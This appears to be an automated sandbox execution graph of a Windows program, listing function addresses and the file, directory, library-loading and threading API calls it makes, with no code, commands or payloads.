                                                                                                execution_graph 61485 929a10 61486 929ad4 61485->61486 61487 929a5d 61485->61487 61560 9295f0 67 API calls 61486->61560 61558 927c60 29 API calls 61487->61558 61490 929adc 61511 926c50 61490->61511 61492 929a9d 61559 929fe0 40 API calls 61492->61559 61495 929af4 61497 929b12 61495->61497 61561 927f30 24 API calls 61495->61561 61496 929ab3 61499 926c50 28 API calls 61496->61499 61498 929b2d 61497->61498 61562 927f30 24 API calls 61497->61562 61502 929b44 61498->61502 61563 927f30 24 API calls 61498->61563 61503 929abc 61499->61503 61516 929b90 61502->61516 61503->61490 61508 929b6c 61565 a4566b 61508->61565 61510 929b86 61512 926c71 61511->61512 61513 926c78 61512->61513 61572 927c00 61512->61572 61513->61495 61515 926caa 61515->61495 61517 929bff GetTempFileNameW 61516->61517 61518 929bfd 61516->61518 61519 929c14 61517->61519 61520 929c3e 61517->61520 61518->61517 61521 a4566b 5 API calls 61519->61521 61611 927c60 29 API calls 61520->61611 61523 929b54 61521->61523 61564 927f30 24 API calls 61523->61564 61525 929c96 61526 929f49 61525->61526 61527 929c9e 61525->61527 61529 926c50 28 API calls 61526->61529 61528 926c50 28 API calls 61527->61528 61530 929cc9 61528->61530 61531 929f74 61529->61531 61612 9a7020 52 API calls 61530->61612 61621 9a7020 52 API calls 61531->61621 61534 929cd8 61613 9a7450 24 API calls 61534->61613 61535 929f83 61622 9a7450 24 API calls 61535->61622 61538 929ecd 61623 927f30 24 API calls 61538->61623 61539 929cee 61614 927f30 24 API calls 61539->61614 61541 929cfd 61615 927c60 29 API calls 61541->61615 61544 929d5c 61616 9a62a0 28 API calls 61544->61616 61546 929e13 MoveFileW 61617 927f30 24 API calls 61546->61617 61547 929df5 61547->61546 61549 929e32 61550 929e3a 61549->61550 61551 929edb 61549->61551 61552 929b90 52 API calls 61550->61552 61620 927f30 24 API calls 61551->61620 61554 929e57 DeleteFileW 61552->61554 61618 927f30 24 API calls 61554->61618 61556 929ebe 61619 927f30 24 API calls 61556->61619 61558->61492 61559->61496 61560->61490 61561->61497 61562->61498 61563->61502 61564->61508 61566 a45674 61565->61566 61567 a45676 IsProcessorFeaturePresent 61565->61567 61566->61510 61569 a45b74 61567->61569 61624 a45b37 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 61569->61624 61571 a45c57 61571->61510 61573 927c4b 61572->61573 61574 927c0b 61572->61574 61605 927be0 28 API calls 61573->61605 61576 927c36 61574->61576 61577 927c14 61574->61577 61580 927c46 61576->61580 61597 a456ad 61576->61597 61577->61573 61579 927c1b 61577->61579 61578 927c21 61585 927c2a 61578->61585 61606 a4a21f 24 API calls 61578->61606 61582 a456ad 3 API calls 61579->61582 61580->61515 61582->61578 61584 927c40 61584->61515 61585->61515 61598 a456b2 61597->61598 61599 a456cc 61598->61599 61601 a456ce 61598->61601 61607 a54981 EnterCriticalSection 61598->61607 61599->61584 61608 a47ada 61601->61608 61603 a4638c IsProcessorFeaturePresent 61604 a463b1 61603->61604 61604->61584 61605->61578 61607->61598 61609 a47b21 RaiseException 61608->61609 61610 a47af4 61608->61610 61609->61603 61610->61609 61611->61525 61612->61534 61613->61539 61614->61541 61615->61544 61616->61547 61617->61549 61618->61556 61619->61538 61620->61538 61621->61535 61622->61538 61623->61519 61624->61571 61625 9291d0 61626 9291dc 61625->61626 61627 929214 61625->61627 61626->61627 61629 928fc0 61626->61629 61630 928fcd 61629->61630 61631 a47ada RaiseException 61630->61631 61632 928fda RtlAllocateHeap 61631->61632 61632->61627 61633 94ef90 61634 94efa3 61633->61634 61639 a4716d 61634->61639 61637 94efb9 SetUnhandledExceptionFilter 61638 94efcb 61637->61638 61644 a471a5 61639->61644 61642 a471a5 47 API calls 61643 94efad 61642->61643 61643->61637 61643->61638 61658 a471b3 61644->61658 61646 a471aa 61647 a47176 61646->61647 61674 a5f852 EnterCriticalSection 61646->61674 61647->61642 61649 a54923 61652 a5492c IsProcessorFeaturePresent 61649->61652 61653 a5494b 61649->61653 61650 a54917 61650->61649 61675 a5f897 36 API calls 61650->61675 61654 a54938 61652->61654 61682 a54de1 22 API calls 61653->61682 61676 a4a063 61654->61676 61657 a54955 61659 a471bc 61658->61659 61660 a471bf GetLastError 61658->61660 61659->61646 61683 a49d45 6 API calls 61660->61683 61662 a471d4 61663 a47239 SetLastError 61662->61663 61673 a471f3 61662->61673 61684 a49d80 6 API calls 61662->61684 61663->61646 61665 a471ed 61665->61673 61685 a50a2e 14 API calls 61665->61685 61673->61663 61674->61650 61675->61649 61677 a4a07f 61676->61677 61678 a4a0ab IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 61677->61678 61681 a4a17c 61678->61681 61679 a4566b 5 API calls 61680 a4a19a 61679->61680 61680->61653 61681->61679 61682->61657 61683->61662 61684->61665 61686 6d9645d0 61689 6d9645f0 61686->61689 61687 6d964634 GetAdaptersInfo 61688 6d964687 61687->61688 61687->61689 61689->61687 61690 963e50 61691 963ec7 61690->61691 61692 963efe 61691->61692 61693 963f18 SetWindowLongW 61691->61693 61693->61692 61694 6d96ba90 61701 6d96ccc0 61694->61701 61696 6d96bac0 61710 6d967fc0 61696->61710 61698 6d96bae6 61699 6d96bb6b 61698->61699 61716 6d9708c0 61698->61716 61702 6d967fc0 2 API calls 61701->61702 61703 6d96cd16 61702->61703 61704 6d967fc0 2 API calls 61703->61704 61705 6d96cd7e 61704->61705 61706 6d967fc0 2 API calls 61705->61706 61707 6d96cdeb 61706->61707 61725 6d96f430 61707->61725 61709 6d96ce0d 61709->61696 61711 6d98a8da 61710->61711 61712 6d967fd3 #74 61711->61712 61713 6d968004 61712->61713 61714 6d96800a 61712->61714 61713->61698 61715 6d96802c #74 61714->61715 61715->61698 61717 6d9708d5 61716->61717 61721 6d9708e0 61716->61721 61717->61699 61718 6d970983 61853 6d9709b0 61718->61853 61721->61718 61849 6d973ef0 61721->61849 61722 6d97098e 61723 6d97099d 61722->61723 61724 6d973ef0 37 API calls 61722->61724 61723->61699 61724->61723 61726 6d96f46f 61725->61726 61729 6d970290 61726->61729 61728 6d96f487 61728->61709 61736 6d964d40 61729->61736 61731 6d9702de 61732 6d964d40 6 API calls 61731->61732 61733 6d9702ee 61732->61733 61741 6d973b80 61733->61741 61735 6d970429 61735->61728 61737 6d964d61 61736->61737 61738 6d964d68 61737->61738 61750 6d98eb8f 6 API calls 61737->61750 61738->61731 61751 6d973990 61741->61751 61743 6d973bcc 61758 6d976d40 61743->61758 61745 6d973c2c 61746 6d976d40 7 API calls 61745->61746 61747 6d973c54 61746->61747 61772 6d971cd0 61747->61772 61749 6d973c64 61749->61735 61776 6d983440 SHGetSpecialFolderPathW 61751->61776 61753 6d9739e0 61754 6d976d40 7 API calls 61753->61754 61755 6d973b01 61754->61755 61783 6d983250 61755->61783 61757 6d973b26 61757->61743 61759 6d976d96 61758->61759 61761 6d976da3 61758->61761 61760 6d964d40 6 API calls 61759->61760 61771 6d976d9e 61760->61771 61762 6d976f07 61761->61762 61764 6d976de0 PathIsUNCW 61761->61764 61763 6d964d40 6 API calls 61762->61763 61763->61771 61765 6d976ec2 61764->61765 61766 6d976dfb 61764->61766 61765->61762 61767 6d976eeb 61765->61767 61766->61762 61768 6d976e28 61766->61768 61769 6d964d40 6 API calls 61767->61769 61770 6d964d40 6 API calls 61768->61770 61769->61771 61770->61771 61771->61745 61773 6d971d18 61772->61773 61830 6d982550 61773->61830 61775 6d971d4d 61775->61749 61777 6d98349a 61776->61777 61782 6d9834a9 61777->61782 61795 6d966820 61777->61795 61779 6d98353d 61780 6d983558 61779->61780 61781 6d98354a FreeLibrary 61779->61781 61780->61753 61781->61780 61782->61753 61782->61782 61798 6d982cf0 61783->61798 61785 6d98327f 61786 6d983283 61785->61786 61787 6d983297 PathIsUNCW 61785->61787 61786->61757 61809 6d982ee0 61787->61809 61789 6d9833b1 61789->61757 61790 6d98333a CreateDirectoryW 61791 6d983349 GetLastError 61790->61791 61792 6d9832cc 61790->61792 61791->61792 61792->61789 61792->61790 61793 6d9833b3 61792->61793 61793->61789 61828 6d982bf0 RtlAllocateHeap RemoveDirectoryW RemoveDirectoryW GetLastError 61793->61828 61796 6d96682d 61795->61796 61797 6d96683a RtlAllocateHeap 61796->61797 61797->61779 61799 6d982d25 61798->61799 61800 6d982d2d 61798->61800 61799->61785 61800->61799 61801 6d982e25 61800->61801 61804 6d982d4d 61800->61804 61802 6d966820 RtlAllocateHeap 61801->61802 61803 6d982e2f 61802->61803 61804->61799 61805 6d982d7d FindFirstFileW 61804->61805 61806 6d982daa 61805->61806 61807 6d982dd4 GetLastError FindClose 61805->61807 61806->61799 61808 6d982dbf FindClose 61806->61808 61807->61799 61808->61799 61812 6d982f19 61809->61812 61810 6d98322c 61811 6d966820 RtlAllocateHeap 61810->61811 61825 6d983086 61811->61825 61812->61810 61820 6d982f42 61812->61820 61813 6d982cf0 5 API calls 61814 6d98327f 61813->61814 61815 6d983283 61814->61815 61816 6d983297 PathIsUNCW 61814->61816 61815->61792 61817 6d982ee0 8 API calls 61816->61817 61823 6d9832cc 61817->61823 61818 6d98306c PathIsUNCW 61818->61825 61819 6d9833b1 61819->61792 61820->61818 61821 6d98333a CreateDirectoryW 61822 6d983349 GetLastError 61821->61822 61821->61823 61822->61823 61823->61819 61823->61821 61824 6d9833b3 61823->61824 61824->61819 61829 6d982bf0 RtlAllocateHeap RemoveDirectoryW RemoveDirectoryW GetLastError 61824->61829 61825->61813 61827 6d9830f8 61825->61827 61827->61792 61828->61789 61829->61819 61831 6d98259c CreateFileW 61830->61831 61833 6d9825ed 61831->61833 61834 6d9825f7 61831->61834 61836 6d98282c 61833->61836 61837 6d98281e CloseHandle 61833->61837 61835 6d982640 ReadFile 61834->61835 61838 6d98261f 61834->61838 61842 6d982667 61835->61842 61843 6d98265f 61835->61843 61836->61775 61837->61836 61838->61835 61840 6d982809 61840->61833 61841 6d982690 SetFilePointer GetFileSize 61841->61843 61845 6d9826b6 61841->61845 61842->61841 61842->61843 61846 6d98271d 61842->61846 61848 6d964bb0 6 API calls 61843->61848 61844 6d982700 ReadFile 61844->61843 61844->61846 61845->61844 61846->61843 61847 6d9827ca ReadFile 61846->61847 61847->61843 61847->61846 61848->61840 61850 6d973f3b 61849->61850 61889 6d973d10 61850->61889 61852 6d973fcd 61852->61718 61854 6d9709f9 61853->61854 61855 6d970a00 61853->61855 61854->61722 61856 6d964d40 6 API calls 61855->61856 61857 6d970a60 61855->61857 61856->61857 61858 6d964d40 6 API calls 61857->61858 61859 6d970ad7 61857->61859 61858->61859 61860 6d964d40 6 API calls 61859->61860 61861 6d970b4a 61859->61861 61860->61861 61862 6d964d40 6 API calls 61861->61862 61863 6d970bbd 61861->61863 61862->61863 61864 6d964d40 6 API calls 61863->61864 61866 6d970c30 61863->61866 61864->61866 61865 6d973990 24 API calls 61868 6d970c5b 61865->61868 61866->61865 61867 6d970e60 61869 6d970ea7 61867->61869 61870 6d970f75 61867->61870 61868->61867 61873 6d976d40 7 API calls 61868->61873 61871 6d973990 24 API calls 61869->61871 61870->61722 61872 6d970eb3 61871->61872 61918 6d970fa0 11 API calls 61872->61918 61876 6d970cd7 61873->61876 61875 6d970ec3 61881 6d973d10 37 API calls 61875->61881 61877 6d976d40 7 API calls 61876->61877 61878 6d970cff 61877->61878 61879 6d971cd0 13 API calls 61878->61879 61880 6d970d0f 61879->61880 61880->61867 61888 6d970d36 61880->61888 61882 6d970f5a 61881->61882 61882->61870 61883 6d970e01 61884 6d972380 6 API calls 61883->61884 61886 6d970e0d 61884->61886 61885 6d964d40 6 API calls 61885->61888 61917 6d968860 6 API calls 61886->61917 61888->61883 61888->61885 61890 6d973990 24 API calls 61889->61890 61891 6d973d4d 61890->61891 61892 6d976d40 7 API calls 61891->61892 61893 6d973dad 61892->61893 61894 6d976d40 7 API calls 61893->61894 61895 6d973dd5 61894->61895 61896 6d971cd0 13 API calls 61895->61896 61897 6d973de5 61896->61897 61898 6d964d40 6 API calls 61897->61898 61899 6d973e4a 61898->61899 61900 6d964d40 6 API calls 61899->61900 61901 6d973e5f 61900->61901 61904 6d972380 61901->61904 61903 6d973eb4 61903->61852 61905 6d9723f8 61904->61905 61906 6d972415 CreateFileW 61905->61906 61908 6d972601 61905->61908 61907 6d972449 61906->61907 61916 6d972450 61906->61916 61907->61908 61910 6d9725ee CloseHandle 61907->61910 61908->61903 61909 6d972540 GetFileSize 61911 6d972555 WriteFile 61909->61911 61912 6d97257b 61909->61912 61910->61908 61911->61912 61913 6d97257f SetFilePointer 61912->61913 61914 6d97258b WriteFile 61912->61914 61913->61914 61914->61907 61916->61909 61917->61854 61918->61875 61919 9749d0 GetSystemDirectoryW 61920 974a1f 61919->61920 61939 974adb 61919->61939 61920->61939 61940 9292f0 61920->61940 61921 a4566b 5 API calls 61923 974b2b 61921->61923 61925 974b33 61927 928fc0 2 API calls 61925->61927 61926 974a39 61929 974a55 61926->61929 61930 974a63 61926->61930 61928 974b3d 61927->61928 61967 935370 34 API calls 61929->61967 61968 928e70 26 API calls 61930->61968 61932 974a61 61955 939140 61932->61955 61935 974aa2 61936 939140 30 API calls 61935->61936 61937 974ac9 61936->61937 61938 974adf LoadLibraryExW 61937->61938 61937->61939 61938->61939 61939->61921 61941 929328 61940->61941 61952 92937c 61940->61952 61969 a45a61 EnterCriticalSection 61941->61969 61944 a45a61 4 API calls 61946 929396 61944->61946 61945 92933e GetProcessHeap 61973 a45919 27 API calls 61945->61973 61954 929407 61946->61954 61975 a45919 27 API calls 61946->61975 61948 92936b 61974 a45a17 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 61948->61974 61951 9293f6 61976 a45a17 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 61951->61976 61952->61944 61952->61954 61954->61925 61954->61926 61956 9391da 61955->61956 61961 939162 61955->61961 61957 928fc0 2 API calls 61956->61957 61958 9391e4 61957->61958 61980 927c60 29 API calls 61958->61980 61960 93923f 61960->61935 61961->61956 61962 9391a0 61961->61962 61978 928d50 26 API calls 61961->61978 61979 928dc0 24 API calls 61962->61979 61965 9391bd 61965->61956 61966 9391c7 61965->61966 61966->61935 61967->61932 61968->61932 61970 a45a75 61969->61970 61971 929332 61970->61971 61977 a45ae9 SleepConditionVariableCS WaitForSingleObjectEx EnterCriticalSection 61970->61977 61971->61945 61971->61952 61973->61948 61974->61952 61975->61951 61976->61954 61977->61970 61978->61962 61979->61965 61980->61960 61981 9ce2d0 61982 9ce396 61981->61982 61987 9ce30e 61981->61987 62178 9cea30 30 API calls 61982->62178 61984 9ce3a0 61985 998be0 26 API calls 61984->61985 61995 9ce392 61985->61995 61986 9ce405 62015 9311f0 RaiseException 61986->62015 61987->61986 61988 9ce329 61987->61988 62079 9b11c0 61988->62079 61990 9ce411 61992 9ce455 61990->61992 62001 9ce4d1 61990->62001 61994 9ce4bb 61992->61994 61998 9292f0 36 API calls 61992->61998 61997 9ce553 62186 9cdb20 44 API calls 61997->62186 62003 9ce45f 61998->62003 61999 9ce350 62098 9cec60 61999->62098 62001->61997 62002 9ce5a5 62001->62002 62179 9cb6f0 62001->62179 62190 9311f0 RaiseException 62002->62190 62006 9ce469 62003->62006 62007 9ce5b1 62003->62007 62004 9ce561 62011 9ce48e 62004->62011 62187 a4cf16 62004->62187 62016 9ce5c0 62006->62016 62010 928fc0 2 API calls 62007->62010 62012 9ce5bb 62010->62012 62015->61990 62191 9ce9f0 RaiseException 62016->62191 62018 9ce60d 62019 9ce624 62018->62019 62020 9cb6f0 15 API calls 62018->62020 62192 9d0c20 84 API calls 62019->62192 62020->62019 62022 9ce62f 62023 9b11c0 38 API calls 62022->62023 62024 9ce63f 62023->62024 62025 998be0 26 API calls 62024->62025 62034 9ce651 62025->62034 62026 9ce6bb 62028 9ce90a 62026->62028 62031 9ce6cf 62026->62031 62027 9ce920 62030 928fc0 2 API calls 62027->62030 62273 9311f0 RaiseException 62028->62273 62033 9ce92a 62030->62033 62239 9b2b40 88 API calls 62031->62239 62032 9ce916 62037 928fc0 2 API calls 62032->62037 62034->62026 62034->62027 62238 9b13c0 26 API calls 62034->62238 62036 9ce6e0 62039 939140 30 API calls 62036->62039 62037->62027 62040 9ce6f1 62039->62040 62041 9ce708 62040->62041 62042 9292f0 36 API calls 62040->62042 62041->62040 62043 9ce715 62042->62043 62043->62032 62044 9ce71f 62043->62044 62045 9ce73d 62044->62045 62046 9ce748 62044->62046 62240 935370 34 API calls 62045->62240 62241 9b4340 28 API calls 62046->62241 62049 9ce752 62050 9ce78c 62049->62050 62051 9ce746 62049->62051 62052 9ce7a0 62050->62052 62193 9ce9f0 RaiseException 62050->62193 62051->62049 62051->62050 62242 9b1300 26 API calls 62051->62242 62052->62050 62055 9ce781 62057 939140 30 API calls 62055->62057 62056 9ce7b1 62058 9ce7bd 62056->62058 62059 9ce7d6 62056->62059 62057->62050 62060 9ce872 62058->62060 62061 9cb6f0 15 API calls 62058->62061 62059->62060 62062 9cb6f0 15 API calls 62059->62062 62225 9d0060 62060->62225 62073 9ce7d1 62061->62073 62064 9ce803 62062->62064 62194 9d0f10 62064->62194 62066 9ce838 62070 9ce8dc 62066->62070 62072 a4cf16 13 API calls 62066->62072 62070->62011 62071 9ce849 62071->62073 62075 a4cf16 13 API calls 62071->62075 62072->62070 62073->62060 62075->62073 62076 9ce823 62076->62071 62077 9ce827 62076->62077 62077->62066 62078 a4cf16 13 API calls 62077->62078 62078->62066 62081 9b1205 62079->62081 62080 9292f0 36 API calls 62082 9b1215 62080->62082 62081->62080 62083 9b1222 62081->62083 62082->62083 62084 9b1265 62082->62084 62571 99ce70 62083->62571 62086 928fc0 2 API calls 62084->62086 62087 9b126f 62086->62087 62088 9b124f 62089 998be0 62088->62089 62090 998c43 62089->62090 62091 998bf6 62089->62091 62090->61999 62092 998c30 62091->62092 62093 998c06 62091->62093 62585 928e70 26 API calls 62092->62585 62095 928b00 26 API calls 62093->62095 62097 998c0c 62095->62097 62096 998c3b 62096->61999 62097->61999 62099 9cf375 62098->62099 62104 9cec95 62098->62104 62619 9311f0 RaiseException 62099->62619 62101 9cf381 62103 928fc0 2 API calls 62101->62103 62102 9cecb4 62102->61995 62105 9cf38b 62103->62105 62104->62099 62104->62102 62106 928b00 26 API calls 62104->62106 62107 928fc0 2 API calls 62105->62107 62108 9cecf7 62106->62108 62109 9cf395 62107->62109 62108->62099 62110 9b11c0 38 API calls 62108->62110 62111 9ced22 62110->62111 62586 9354d0 62111->62586 62116 9ced75 62117 9cee10 62116->62117 62118 9ceda1 GetLastError 62116->62118 62120 9db9d0 6 API calls 62117->62120 62612 9b6f00 73 API calls 62118->62612 62122 9cee1d 62120->62122 62121 9cedb8 62123 9b35e0 84 API calls 62121->62123 62124 9cee46 62122->62124 62133 9cef11 62122->62133 62125 9cedcf 62123->62125 62127 9292f0 36 API calls 62124->62127 62155 9cede5 62124->62155 62613 9bd490 38 API calls 62125->62613 62126 9cef68 62129 9cef90 62126->62129 62614 9affb0 28 API calls 62126->62614 62130 9cee58 62127->62130 62132 9b3a00 112 API calls 62129->62132 62130->62101 62134 9cee62 62130->62134 62135 9cefa1 CreateFileW 62132->62135 62133->62099 62133->62126 62136 9b35e0 84 API calls 62133->62136 62143 939140 30 API calls 62134->62143 62137 9cefd9 GetLastError 62135->62137 62138 9cf12a 62135->62138 62136->62126 62615 9b6f00 73 API calls 62137->62615 62138->62099 62139 9cf136 SetFilePointer 62138->62139 62141 9cf165 GetLastError 62139->62141 62142 9cf1d6 62139->62142 62617 9b6f00 73 API calls 62141->62617 62609 9d1790 62142->62609 62148 9cee80 62143->62148 62144 9ceff5 62145 9b35e0 84 API calls 62144->62145 62149 9cf00c 62145->62149 62151 9b11c0 38 API calls 62148->62151 62616 9bd490 38 API calls 62149->62616 62150 9cf17f 62152 9b35e0 84 API calls 62150->62152 62158 9cee92 62151->62158 62154 9cf194 62152->62154 62618 9bd490 38 API calls 62154->62618 62155->61995 62157 9cf23f ReadFile 62159 9cf2c9 62157->62159 62167 9cf1ee 62157->62167 62158->62155 62161 939140 30 API calls 62158->62161 62159->62099 62176 9cf0f0 62159->62176 62161->62155 62163 9cf284 WriteFile 62163->62159 62163->62167 62165 9cf307 FindCloseChangeNotification 62165->62155 62167->62099 62167->62157 62167->62159 62167->62163 62167->62176 62176->62155 62176->62165 62178->61984 62180 9cb72a 62179->62180 62183 9cb73b 62179->62183 62181 928fc0 2 API calls 62180->62181 62180->62183 62182 9cb7ca 62181->62182 62184 9cb801 62182->62184 62185 a4cf16 13 API calls 62182->62185 62183->62001 62184->62001 62185->62184 62186->62004 62627 a56178 62187->62627 62189 a4cf2e 62189->62011 62190->62007 62191->62018 62192->62022 62193->62056 62195 9292f0 36 API calls 62194->62195 62196 9d0f5c 62195->62196 62197 9d1374 62196->62197 62274 9cffa0 62196->62274 62198 928fc0 2 API calls 62197->62198 62199 9d137e 62198->62199 62322 9311f0 RaiseException 62199->62322 62202 9d138a 62203 928fc0 2 API calls 62202->62203 62204 9d1394 62203->62204 62205 a4566b 5 API calls 62206 9ce810 62205->62206 62206->62071 62243 9d13a0 62206->62243 62208 9ef600 2 API calls 62224 9d0f8a 62208->62224 62211 9d0f83 62211->62197 62211->62199 62211->62202 62212 9292f0 36 API calls 62211->62212 62219 9d12b2 62211->62219 62223 9d115b 62211->62223 62211->62224 62292 9ef6e0 62211->62292 62298 928b00 62211->62298 62309 9ef780 CreateFileW 62211->62309 62314 9b2aa0 84 API calls 62211->62314 62316 9ef600 62211->62316 62212->62211 62213 9b11c0 38 API calls 62213->62223 62215 9d1187 FindFirstFileW 62216 9d11c5 FindClose 62215->62216 62215->62223 62216->62223 62217 9292f0 36 API calls 62217->62223 62219->62208 62220 9ef780 3 API calls 62220->62223 62222 9d12ca 62222->62219 62223->62197 62223->62211 62223->62213 62223->62215 62223->62217 62223->62220 62223->62222 62315 9b13c0 26 API calls 62223->62315 62224->62205 62226 9292f0 36 API calls 62225->62226 62230 9d00b5 62226->62230 62227 9d0ad7 62228 928fc0 2 API calls 62227->62228 62229 9d0ae1 62228->62229 62230->62227 62231 9292f0 36 API calls 62230->62231 62232 9d00f4 62231->62232 62232->62227 62233 9292f0 36 API calls 62232->62233 62234 9d0112 62233->62234 62234->62227 62235 9292f0 36 API calls 62234->62235 62236 9d024e 62235->62236 62236->62227 62338 9ef860 62236->62338 62238->62026 62239->62036 62240->62051 62241->62049 62242->62055 62244 9d13df 62243->62244 62245 9d13e9 62243->62245 62366 928c70 26 API calls 62244->62366 62367 9db9d0 62245->62367 62248 9d13f2 62249 9d14e2 62248->62249 62250 9d1438 62248->62250 62377 9b35e0 62248->62377 62258 9d14fe 62249->62258 62380 9b3a00 62249->62380 62254 9292f0 36 API calls 62250->62254 62267 9d1499 62250->62267 62251 9d161f 62251->62076 62257 9d144a 62254->62257 62256 9292f0 36 API calls 62256->62258 62259 9d1635 62257->62259 62260 9d1452 62257->62260 62258->62251 62258->62256 62258->62259 62261 9d151f 62258->62261 62262 928fc0 2 API calls 62259->62262 62264 939140 30 API calls 62260->62264 62261->62251 62261->62258 62271 9d15b8 SetFilePointer SetEndOfFile 62261->62271 62404 9287a0 52 API calls 62261->62404 62263 9d163f 62262->62263 62269 9d1475 62264->62269 62266 9d1548 CreateFileW 62405 9affb0 28 API calls 62266->62405 62267->62076 62269->62267 62270 939140 30 API calls 62269->62270 62270->62267 62271->62261 62272 9d15e1 CloseHandle 62271->62272 62272->62261 62273->62032 62323 928bc0 62274->62323 62279 9cffc4 62279->62211 62280 998be0 26 API calls 62281 9cffde 62280->62281 62282 9d0046 62281->62282 62283 939140 30 API calls 62281->62283 62334 9311f0 RaiseException 62282->62334 62285 9cfffa 62283->62285 62285->62282 62287 9cffff 62285->62287 62286 9d0052 62288 9d003a 62287->62288 62289 9cec60 151 API calls 62287->62289 62288->62211 62290 9d002e 62289->62290 62333 9affb0 28 API calls 62290->62333 62293 9ef6ee LoadLibraryW 62292->62293 62294 9ef6e9 62292->62294 62295 9ef707 62293->62295 62294->62211 62296 9ef727 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 62295->62296 62297 9ef721 62295->62297 62296->62211 62297->62211 62299 928b0b 62298->62299 62300 928b1a 62299->62300 62301 928b52 62299->62301 62302 928b33 62299->62302 62300->62211 62337 928d00 26 API calls 62301->62337 62336 928dc0 24 API calls 62302->62336 62305 928b57 62307 928b00 26 API calls 62305->62307 62306 928b4a 62306->62211 62308 928b96 62307->62308 62308->62211 62310 9ef7ad 62309->62310 62311 9ef825 62310->62311 62312 928fc0 2 API calls 62310->62312 62311->62211 62313 9ef857 62312->62313 62314->62211 62315->62223 62317 9ef640 62316->62317 62318 9ef675 62317->62318 62319 9ef664 FreeLibrary 62317->62319 62320 9ef6b8 CloseHandle 62318->62320 62321 9ef6c9 62318->62321 62319->62318 62320->62321 62321->62211 62322->62202 62324 928bf3 62323->62324 62325 928c02 62323->62325 62324->62325 62326 928fc0 2 API calls 62324->62326 62328 9ce990 62325->62328 62327 928c5c 62326->62327 62329 9ce9ce 62328->62329 62331 9ce99f 62328->62331 62329->62279 62329->62280 62331->62329 62335 9311f0 RaiseException 62331->62335 62332 9ce9e4 62333->62288 62334->62286 62335->62332 62336->62306 62337->62305 62339 9ef895 CreateEventW 62338->62339 62340 9ef8c3 CreateThread 62338->62340 62344 9ef8aa 62339->62344 62341 9ef9b7 WaitForSingleObject GetExitCodeThread 62340->62341 62346 9ef8ff 62340->62346 62351 9efbe0 62340->62351 62342 9ef9e4 CloseHandle 62341->62342 62343 9ef9f2 62341->62343 62342->62343 62343->62227 62344->62340 62345 9ef99b 62345->62341 62346->62345 62347 9efa08 62346->62347 62350 9311f0 RaiseException 62347->62350 62349 9efa14 62350->62349 62356 9efa20 62351->62356 62353 9efbe4 62354 9efa20 RaiseException 62353->62354 62355 9efbe9 62354->62355 62358 9efa5a 62356->62358 62357 9efb99 62357->62353 62358->62357 62365 9311f0 RaiseException 62358->62365 62360 9efbdb 62361 9efa20 RaiseException 62360->62361 62362 9efbe4 62361->62362 62363 9efa20 RaiseException 62362->62363 62364 9efbe9 62363->62364 62364->62353 62365->62360 62366->62245 62368 9dbb1a 62367->62368 62373 9db9f5 62367->62373 62369 a4566b 5 API calls 62368->62369 62370 9dbb2d 62369->62370 62370->62248 62371 9dba91 GetDiskFreeSpaceExW 62372 9dbaef 62371->62372 62371->62373 62372->62368 62374 9dbb03 62372->62374 62373->62368 62373->62371 62375 a4566b 5 API calls 62374->62375 62376 9dbb16 62375->62376 62376->62248 62406 92d350 62377->62406 62379 9b3611 62379->62249 62379->62250 62421 9b3460 62380->62421 62383 9b3a49 PathIsUNCW 62424 9b3690 62383->62424 62384 9b3a35 62384->62258 62386 9b3a7e 62387 9b3c09 62386->62387 62389 928b00 26 API calls 62386->62389 62505 9311f0 RaiseException 62387->62505 62403 9b3a95 62389->62403 62390 9b3c15 62391 9b3b3b 62500 99fd50 62391->62500 62392 928b00 26 API calls 62392->62403 62395 939140 30 API calls 62395->62403 62396 939140 30 API calls 62397 9b3afc CreateDirectoryW 62396->62397 62398 9b3b10 GetLastError 62397->62398 62397->62403 62398->62403 62400 9b3b2e 62400->62391 62401 9b3b33 62400->62401 62499 9b30d0 101 API calls 62401->62499 62403->62387 62403->62391 62403->62392 62403->62395 62403->62396 62403->62400 62504 9affb0 28 API calls 62403->62504 62404->62266 62405->62261 62407 92d3a5 62406->62407 62408 92d44e 62406->62408 62409 92d3fa 62407->62409 62411 92d3ca 62407->62411 62410 928fc0 2 API calls 62408->62410 62413 9292f0 36 API calls 62409->62413 62416 92d40f 62409->62416 62412 92d458 62410->62412 62414 928b00 26 API calls 62411->62414 62413->62416 62417 92d3d2 62414->62417 62420 92d460 72 API calls 62416->62420 62417->62379 62419 92d429 62419->62379 62420->62419 62506 9b34a0 62421->62506 62425 9292f0 36 API calls 62424->62425 62426 9b36c9 62425->62426 62427 9b39db 62426->62427 62430 9292f0 36 API calls 62426->62430 62428 928fc0 2 API calls 62427->62428 62429 9b39e5 62428->62429 62560 9311f0 RaiseException 62429->62560 62432 9b36ea 62430->62432 62432->62427 62434 9b36f2 62432->62434 62433 9b39f1 62435 9b3460 10 API calls 62433->62435 62439 9b35e0 84 API calls 62434->62439 62436 9b3a31 62435->62436 62437 9b3a49 PathIsUNCW 62436->62437 62438 9b3a35 62436->62438 62440 9b3690 105 API calls 62437->62440 62438->62386 62441 9b370a 62439->62441 62442 9b3a7e 62440->62442 62443 9b3813 62441->62443 62444 9b3715 62441->62444 62446 9b3c09 62442->62446 62451 928b00 26 API calls 62442->62451 62445 998be0 26 API calls 62443->62445 62447 9b37a7 62444->62447 62459 9b373b 62444->62459 62449 9b381c PathIsUNCW 62445->62449 62563 9311f0 RaiseException 62446->62563 62450 92d350 84 API calls 62447->62450 62453 9b3836 62449->62453 62454 9b37c1 62450->62454 62493 9b3a95 62451->62493 62452 9b3c15 62457 92d350 84 API calls 62453->62457 62455 998be0 26 API calls 62454->62455 62458 9b37d1 62455->62458 62456 9b3b3b 62463 99fd50 13 API calls 62456->62463 62460 9b3862 62457->62460 62465 939140 30 API calls 62458->62465 62462 92d350 84 API calls 62459->62462 62464 939140 30 API calls 62460->62464 62461 928b00 26 API calls 62461->62493 62466 9b3755 62462->62466 62467 9b3b8f 62463->62467 62468 9b3874 62464->62468 62469 9b37a5 62465->62469 62470 998be0 26 API calls 62466->62470 62467->62386 62519 9b1300 26 API calls 62468->62519 62469->62449 62471 9b3765 62470->62471 62475 939140 30 API calls 62471->62475 62473 9b38a0 62476 9b38a9 62473->62476 62477 9b38f2 62473->62477 62474 939140 30 API calls 62478 9b3afc CreateDirectoryW 62474->62478 